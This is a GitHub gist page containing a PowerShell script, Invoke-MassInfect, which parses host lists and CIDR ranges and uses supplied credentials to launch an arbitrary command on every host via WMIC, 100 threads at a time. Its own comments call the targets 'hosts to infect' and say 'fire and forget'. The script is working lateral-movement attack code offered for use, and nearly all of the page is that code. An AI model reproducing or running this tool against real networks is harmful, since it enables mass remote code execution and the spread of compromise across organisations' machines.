Created
July 23, 2015 15:51
-
-
Save rvrsh3ll/8d5d36ccdde38e5c819b to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function Invoke-MassInfect | |
| { | |
| <# | |
| Inspired by Chris Campbell's WMIS command encoder | |
| https://github.com/obscuresec/random/blob/master/EncodeShell.py | |
| CIDR Parser from Matt Graeber's Invoke-PortScanhttps://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
| https://github.com/mattifestation/PowerSploit/blob/master/Recon/Invoke-Portscan.ps1 | |
| .DESCRIPTION | |
| Send commands across a network range quickly with WMIC | |
| .PARAMETER Rhosts | |
| Comma-Separated or CIDR Hosts to infect. | |
| .PARAMETER User | |
| .PARAMETER Password | |
| .Example | |
| Replace username and password with credentials. Add your command, fire and forget. | |
| #> | |
| [CmdletBinding()] | |
| Param ( | |
| [Parameter( | |
| ValueFromPipeline=$True, | |
| Mandatory=$True)] | |
| [String]$Rhosts, | |
| [Parameter( | |
| ValueFromPipeline=$True, | |
| Mandatory=$True)] | |
| [String]$User, | |
| [Parameter( | |
| ValueFromPipeline=$True, | |
| Mandatory=$True)] | |
| [String]$Password, | |
| [Parameter( | |
| ValueFromPipeline=$True, | |
| Mandatory=$True)] | |
| [String]$Cmd | |
| ) | |
| PROCESS { | |
| Set-StrictMode -Version 2.0 | |
| $hostList = New-Object System.Collections.ArrayList | |
| [String] $iHosts = $Rhosts.Split(",") | |
| foreach($iHost in $iHosts) | |
| { | |
| $iHost = $iHost.Replace(" ", "") | |
| if(!$iHost) | |
| { | |
| continue | |
| } | |
| if($iHost.contains("/")) | |
| { | |
| $netPart = $iHost.split("/")[0] | |
| [uint32]$maskPart = $iHost.split("/")[1] | |
| $address = [System.Net.IPAddress]::Parse($netPart) | |
| if ($maskPart -ge $address.GetAddressBytes().Length * 8) | |
| { | |
| throw "Bad host mask" | |
| } | |
| $numhosts = [System.math]::Pow(2,(($address.GetAddressBytes().Length *8) - $maskPart)) | |
| $startaddress = $address.GetAddressBytes() | |
| [array]::Reverse($startaddress) | |
| $startaddress = [System.BitConverter]::ToUInt32($startaddress, 0) | |
| [uint32]$startMask = ([System.math]::Pow(2, $maskPart)-1) * ([System.Math]::Pow(2,(32 - $maskPart))) | |
| $startAddress = $startAddress -band $startMask | |
| #in powershell 2.0 there are 4 0 bytes padded, so the [0..3] is necessary | |
| $startAddress = [System.BitConverter]::GetBytes($startaddress)[0..3] | |
| [array]::Reverse($startaddress) | |
| $address = [System.Net.IPAddress] [byte[]] $startAddress | |
| $hostList.Add($address.IPAddressToString) | |
| for ($i=0; $i -lt $numhosts-1; $i++) | |
| { | |
| $nextAddress = $address.GetAddressBytes() | |
| [array]::Reverse($nextAddress) | |
| $nextAddress = [System.BitConverter]::ToUInt32($nextAddress, 0) | |
| $nextAddress ++ | |
| $nextAddress = [System.BitConverter]::GetBytes($nextAddress)[0..3] | |
| [array]::Reverse($nextAddress) | |
| $address = [System.Net.IPAddress] [byte[]] $nextAddress | |
| $hostList.Add($address.IPAddressToString) | |
| } | |
| } | |
| else | |
| { | |
| $hostList.Add($iHost) | |
| } | |
| } | |
| # Loop through targets and invoke our remote command | |
| # First, we'll setup some threading as seen @ http://pwndizzle.blogspot.com/2013/12/powershell-threading.html | |
| function ForEach-Parallel { | |
| [CmdletBinding()]Param ( | |
| [Parameter(Mandatory=$true,position=0)] | |
| [System.Management.Automation.ScriptBlock] $ScriptBlock, | |
| [Parameter(Mandatory=$true,ValueFromPipeline=$true)] | |
| [PSObject]$InputObject, | |
| [Parameter(Mandatory=$false)] | |
| [int]$MaxThreads=5 | |
| ) | |
| BEGIN { | |
| $iss = [system.management.automation.runspaces.initialsessionstate]::CreateDefault() | |
| $pool = [Runspacefactory]::CreateRunspacePool(1, $maxthreads, $iss, $host) | |
| $pool.open() | |
| $threads = @() | |
| $ScriptBlock = $ExecutionContext.InvokeCommand.NewScriptBlock("param(`$_)`r`n" + $Scriptblock.ToString()) | |
| } | |
| PROCESS { | |
| $powershell = [powershell]::Create().addscript($scriptblock).addargument($InputObject) | |
| $powershell.runspacepool=$pool | |
| $threads+= @{ | |
| instance = $powershell | |
| handle = $powershell.begininvoke() | |
| } | |
| } | |
| END { | |
| $notdone = $true | |
| while ($notdone) { | |
| $notdone = $false | |
| for ($i=0; $i -lt $threads.count; $i++) { | |
| $thread = $threads[$i] | |
| if ($thread) { | |
| if ($thread.handle.iscompleted) { | |
| $thread.instance.endinvoke($thread.handle) | |
| $thread.instance.dispose() | |
| $threads[$i] = $null | |
| } | |
| else { | |
| $notdone = $true | |
| } | |
| } | |
| } | |
| } | |
| } | |
| } | |
| $ErrorActionPreference = "Stop"; | |
| Write-Verbose "Spreading the goodness.." | |
| $hostList | % { $_ } |ForEach-Parallel -MaxThreads 100 { | |
| wmic /node:$_ /user: + $User /password: + $Password process call create "cmd.exe /c $cmd" | |
| } | |
| } | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment